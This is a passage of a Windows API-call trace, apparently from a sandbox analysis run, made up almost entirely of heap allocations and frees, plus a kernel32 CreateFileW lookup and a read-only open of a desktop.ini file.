(HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca448 [0110.001] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2370 [0110.001] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2370 | out: hHeap=0x1780000) returned 1 [0110.001] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca3d0 [0110.001] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e23e0 [0110.001] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca310 [0110.001] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e23e0 | out: hHeap=0x1780000) returned 1 [0110.001] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x80) returned 0x41a5360 [0110.001] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8de0 | out: hHeap=0x1780000) returned 1 [0110.001] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca3a0 [0110.001] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e24a0 [0110.001] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24a0 | out: hHeap=0x1780000) returned 1 [0110.001] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2460 [0110.001] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca280 [0110.001] CharLowerBuffW (in: lpsz="handle", cchLength=0x6 | out: lpsz="handle") returned 0x6 [0110.001] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca3e8 [0110.001] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2480 [0110.001] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e24a0 [0110.001] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca340 [0110.001] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca3e8 | out: hHeap=0x1780000) returned 1 [0110.001] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2480 | out: hHeap=0x1780000) returned 1 [0110.001] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca340 | out: hHeap=0x1780000) returned 1 [0110.001] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24a0 | out: hHeap=0x1780000) returned 1 [0110.001] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf978 [0110.001] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2350 [0110.001] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca2e0 [0110.001] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2370 [0110.002] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2480 [0110.002] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca3e8 [0110.002] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca2e0 | out: hHeap=0x1780000) returned 1 [0110.002] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2370 | out: hHeap=0x1780000) returned 1 [0110.002] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca3e8 | out: hHeap=0x1780000) returned 1 [0110.002] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2480 | out: hHeap=0x1780000) returned 1 [0110.002] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e23e0 [0110.002] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca3b8 [0110.002] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2430 [0110.002] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2370 [0110.002] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca298 [0110.002] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca3b8 | out: hHeap=0x1780000) returned 1 [0110.002] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2430 | out: hHeap=0x1780000) returned 1 [0110.002] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca298 | out: hHeap=0x1780000) returned 1 [0110.002] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2370 | out: hHeap=0x1780000) returned 1 [0110.002] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e24d0 [0110.002] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca268 [0110.002] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2480 [0110.002] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e24e0 [0110.002] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca3e8 [0110.002] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca268 | out: hHeap=0x1780000) returned 1 [0110.002] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2480 | out: hHeap=0x1780000) returned 1 [0110.002] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca3e8 | out: hHeap=0x1780000) returned 1 [0110.002] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24e0 | out: hHeap=0x1780000) returned 1 [0110.002] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2390 [0110.002] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca298 [0110.002] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e23f0 [0110.002] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2370 [0110.003] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca2e0 [0110.003] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca298 | out: hHeap=0x1780000) returned 1 [0110.003] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e23f0 | out: hHeap=0x1780000) returned 1 [0110.003] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca2e0 | out: hHeap=0x1780000) returned 1 [0110.003] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2370 | out: hHeap=0x1780000) returned 1 [0110.003] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2480 [0110.003] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca250 [0110.003] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2490 [0110.003] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e23f0 [0110.003] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca268 [0110.003] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca250 | out: hHeap=0x1780000) returned 1 [0110.003] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2490 | out: hHeap=0x1780000) returned 1 [0110.003] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca268 | out: hHeap=0x1780000) returned 1 [0110.003] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e23f0 | out: hHeap=0x1780000) returned 1 [0110.003] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e24b0 [0110.003] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca2f8 [0110.003] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2490 [0110.003] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2500 [0110.003] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca340 [0110.003] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca2f8 | out: hHeap=0x1780000) returned 1 [0110.003] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2490 | out: hHeap=0x1780000) returned 1 [0110.003] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca340 | out: hHeap=0x1780000) returned 1 [0110.003] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2500 | out: hHeap=0x1780000) returned 1 [0110.003] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2490 [0110.003] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca2e0 [0110.003] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2380 [0110.003] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2370 [0110.003] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca208 [0110.004] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca2e0 | out: hHeap=0x1780000) returned 1 [0110.004] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2380 | out: hHeap=0x1780000) returned 1 [0110.004] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca208 | out: hHeap=0x1780000) returned 1 [0110.004] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2370 | out: hHeap=0x1780000) returned 1 [0110.004] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x772d0000 [0110.004] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca400 [0110.004] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2510 [0110.004] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileW", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0110.004] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca238 [0110.004] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileW", cchWideChar=12, lpMultiByteStr=0x43ca238, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFileW", lpUsedDefaultChar=0x0) returned 12 [0110.004] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca238 | out: hHeap=0x1780000) returned 1 [0110.004] GetProcAddress (hModule=0x772d0000, lpProcName="CreateFileW") returned 0x7733ed10 [0110.004] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca400 | out: hHeap=0x1780000) returned 1 [0110.004] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2510 | out: hHeap=0x1780000) returned 1 [0110.004] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb58 [0110.004] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2400 [0110.004] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2370 [0110.004] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e23f0 [0110.004] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e24a0 [0110.004] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2410 [0110.004] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2430 [0110.004] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2380 [0110.005] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20002) returned 0x4506008 [0110.005] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2400 | out: hHeap=0x1780000) returned 1 [0110.005] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2370 | out: hHeap=0x1780000) returned 1 [0110.005] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e23f0 | out: hHeap=0x1780000) returned 1 [0110.005] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24a0 | out: hHeap=0x1780000) returned 1 [0110.005] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2410 | out: hHeap=0x1780000) returned 1 [0110.005] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2430 | out: hHeap=0x1780000) returned 1 [0110.005] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2380 | out: hHeap=0x1780000) returned 1 [0110.005] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfb58 | out: hHeap=0x1780000) returned 1 [0110.005] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Music\\desktop.ini" (normalized: "c:\\users\\fd1hvy\\music\\desktop.ini"), dwDesiredAccess=0x80000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x258 [0110.005] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2500 [0110.005] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x214) returned 0x43e9350 [0110.005] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf9a0 [0110.005] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca388 [0110.005] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca238 [0110.005] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca3e8 [0110.005] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e23a0 [0110.005] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca3e8 | out: hHeap=0x1780000) returned 1 [0110.005] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e23a0 | out: hHeap=0x1780000) returned 1 [0110.005] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca238 | out: hHeap=0x1780000) returned 1 [0110.005] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca298 [0110.005] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca2e0 [0110.005] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca2f8 [0110.005] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e24a0 [0110.006] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca2f8 | out: hHeap=0x1780000) returned 1 [0110.006] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x50) returned 0x4369c10 [0110.006] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4506008 | out: hHeap=0x1780000) returned 1 [0110.006] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca460 [0110.006] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca3b8 [0110.006] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca418 [0110.006] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2510 [0110.006] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca418 | out: hHeap=0x1780000) returned 1 [0110.006] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2510 | out: hHeap=0x1780000) returned 1 [0110.006] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca3b8 | out: hHeap=0x1780000) returned 1 [0110.006] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca340 [0110.006] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca3b8 [0110.006] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca238 [0110.006] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca238 | out: hHeap=0x1780000) returned 1 [0110.006] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e23a0 | out: hHeap=0x1780000) returned 1 [0110.006] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca3b8 | out: hHeap=0x1780000) returned 1 [0110.006] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca370 | out: hHeap=0x1780000) returned 1 [0110.006] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e23f0 | out: hHeap=0x1780000) returned 1 [0110.006] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca358 | out: hHeap=0x1780000) returned 1 [0110.006] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca478 | out: hHeap=0x1780000) returned 1 [0110.006] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2410 | out: hHeap=0x1780000) returned 1 [0110.006] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca358 | out: hHeap=0x1780000) returned 1 [0110.006] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca220 | out: hHeap=0x1780000) returned 1 [0110.006] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24e0 | out: hHeap=0x1780000) returned 1 [0110.006] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca208 | out: hHeap=0x1780000) returned 1 [0110.006] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca370 | out: hHeap=0x1780000) returned 1 [0110.007] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24e0 | out: hHeap=0x1780000) returned 1 [0110.007] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca358 | out: hHeap=0x1780000) returned 1 [0110.007] FreeLibrary (hLibModule=0x772d0000) returned 1 [0110.007] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2350 | out: hHeap=0x1780000) returned 1 [0110.007] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e23e0 | out: hHeap=0x1780000) returned 1 [0110.007] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24d0 | out: hHeap=0x1780000) returned 1 [0110.007] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2390 | out: hHeap=0x1780000) returned 1 [0110.007] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2480 | out: hHeap=0x1780000) returned 1 [0110.007] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24b0 | out: hHeap=0x1780000) returned 1 [0110.007] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2490 | out: hHeap=0x1780000) returned 1 [0110.007] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf978 | out: hHeap=0x1780000) returned 1 [0110.007] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca280 | out: hHeap=0x1780000) returned 1 [0110.007] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2460 | out: hHeap=0x1780000) returned 1 [0110.007] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca058 | out: hHeap=0x1780000) returned 1 [0110.007] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9ef0 | out: hHeap=0x1780000) returned 1 [0110.007] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca178 | out: hHeap=0x1780000) returned 1 [0110.007] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9ff8 | out: hHeap=0x1780000) returned 1 [0110.007] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca0b8 | out: hHeap=0x1780000) returned 1 [0110.007] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9ed8 | out: hHeap=0x1780000) returned 1 [0110.007] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9ec0 | out: hHeap=0x1780000) returned 1 [0110.007] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca088 | out: hHeap=0x1780000) returned 1 [0110.007] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9f98 | out: hHeap=0x1780000) returned 1 [0110.007] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca0d0 | out: hHeap=0x1780000) returned 1 [0110.007] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca148 | out: hHeap=0x1780000) returned 1 [0110.007] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca118 | out: hHeap=0x1780000) returned 1 [0110.007] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca130 | out: hHeap=0x1780000) returned 1 [0110.007] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca010 | out: hHeap=0x1780000) returned 1 [0110.007] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9f08 | out: hHeap=0x1780000) returned 1 [0110.007] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9fe0 | out: hHeap=0x1780000) returned 1 [0110.007] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9f38 | out: hHeap=0x1780000) returned 1 [0110.008] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9f20 | out: hHeap=0x1780000) returned 1 [0110.008] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca0e8 | out: hHeap=0x1780000) returned 1 [0110.008] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca028 | out: hHeap=0x1780000) returned 1 [0110.008] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca100 | out: hHeap=0x1780000) returned 1 [0110.008] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9e90 | out: hHeap=0x1780000) returned 1 [0110.008] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca2b0 | out: hHeap=0x1780000) returned 1 [0110.008] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca070 | out: hHeap=0x1780000) returned 1 [0110.008] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca448 | out: hHeap=0x1780000) returned 1 [0110.008] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca310 | out: hHeap=0x1780000) returned 1 [0110.008] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca3d0 | out: hHeap=0x1780000) returned 1 [0110.008] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca3a0 | out: hHeap=0x1780000) returned 1 [0110.008] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41a5360 | out: hHeap=0x1780000) returned 1 [0110.008] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2420 | out: hHeap=0x1780000) returned 1 [0110.008] PeekMessageW (in: lpMsg=0x144ebfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ebfc) returned 0 [0110.008] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e8cd8 | out: hHeap=0x1780000) returned 1 [0110.008] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2390 | out: hHeap=0x1780000) returned 1 [0110.008] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24d0 | out: hHeap=0x1780000) returned 1 [0110.008] PeekMessageW (in: lpMsg=0x144ebfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ebfc) returned 0 [0110.008] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e23e0 | out: hHeap=0x1780000) returned 1 [0110.008] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e23e0 | out: hHeap=0x1780000) returned 1 [0110.008] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2380 | out: hHeap=0x1780000) returned 1 [0110.008] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca310 | out: hHeap=0x1780000) returned 1 [0110.008] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfb58 | out: hHeap=0x1780000) returned 1 [0110.008] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796f08 | out: hHeap=0x1780000) returned 1 [0110.008] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e23f0 | out: hHeap=0x1780000) returned 1 [0110.008] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2480 | out: hHeap=0x1780000) returned 1 [0110.008] PeekMessageW (in: lpMsg=0x144ebfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ebfc) returned 0 [0110.008] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e23a0 | out: hHeap=0x1780000) returned 1 [0110.008] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2510 | out: hHeap=0x1780000) returned 1 [0110.008] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8ac8 | out: hHeap=0x1780000) returned 1 [0110.008] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9dd0 | out: hHeap=0x1780000) returned 1 [0110.009] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9da0 | out: hHeap=0x1780000) returned 1 [0110.009] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2170 | out: hHeap=0x1780000) returned 1 [0110.009] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfb80 | out: hHeap=0x1780000) returned 1 [0110.009] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9ea8 | out: hHeap=0x1780000) returned 1 [0110.009] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfd10 | out: hHeap=0x1780000) returned 1 [0110.009] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2450 | out: hHeap=0x1780000) returned 1 [0110.009] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfb30 | out: hHeap=0x1780000) returned 1 [0110.009] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9ba8 | out: hHeap=0x1780000) returned 1 [0110.009] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9bf0 | out: hHeap=0x1780000) returned 1 [0110.009] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf658 | out: hHeap=0x1780000) returned 1 [0110.009] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2140 | out: hHeap=0x1780000) returned 1 [0110.009] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf630 | out: hHeap=0x1780000) returned 1 [0110.009] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9c08 | out: hHeap=0x1780000) returned 1 [0110.009] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9de8 | out: hHeap=0x1780000) returned 1 [0110.009] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2180 | out: hHeap=0x1780000) returned 1 [0110.009] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf9c8 | out: hHeap=0x1780000) returned 1 [0110.009] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9c20 | out: hHeap=0x1780000) returned 1 [0110.009] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391af0 | out: hHeap=0x1780000) returned 1 [0110.009] HeapFree (in: 